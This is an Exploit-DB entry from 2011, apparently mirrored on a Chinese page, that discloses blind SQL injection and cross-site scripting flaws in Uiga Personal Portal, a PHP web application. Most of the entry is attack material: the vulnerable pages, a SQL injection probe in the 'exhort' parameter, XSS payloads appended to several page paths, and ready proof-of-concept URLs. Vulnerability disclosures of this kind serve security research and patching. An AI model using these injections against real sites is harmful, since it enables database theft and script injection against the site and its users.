Uiga Personal Portal – Multiple Vulnerabilities

• Exploit Database
• 115 阅读

• 作者： Eyup CELIK
  日期： 2011-10-20
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18002/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36

  # Exploit Title: Uiga Personal Portal Multiple Vulnerability # Date: 2011 # Author: Eyup CELIK # Version: All Version # Tested on: All versions are Vulnerability # Web Site: www.eyupcelik.com.tr     ISSUE   Blind SQL Injection and XSS can be done using the command input   Vulnerable Page: index.php cart.php includes/photoview.php index2.php   Example: index.php?exhort=%24<Blind SQL Injection Code>&view=ar_det cart.php/<XSS Code> includes/photoview.php/<XSS Code> index2.php/<XSS Code>     Exploit: index.php?exhort=%2440-2+2*3-6&view=ar_det cart.php/"onmouseover=prompt(955787)> includes/photoview.php/"onmouseover=prompt(955787)> index2.php/"onmouseover=prompt(955787)>     POC: 127.0.0.1/uigaportal/index.php?exhort=%2440-2+2*3-6&view=ar_det 127.0.0.1/uigaportal/cart.php/%22onmouseover=prompt(955787)%3E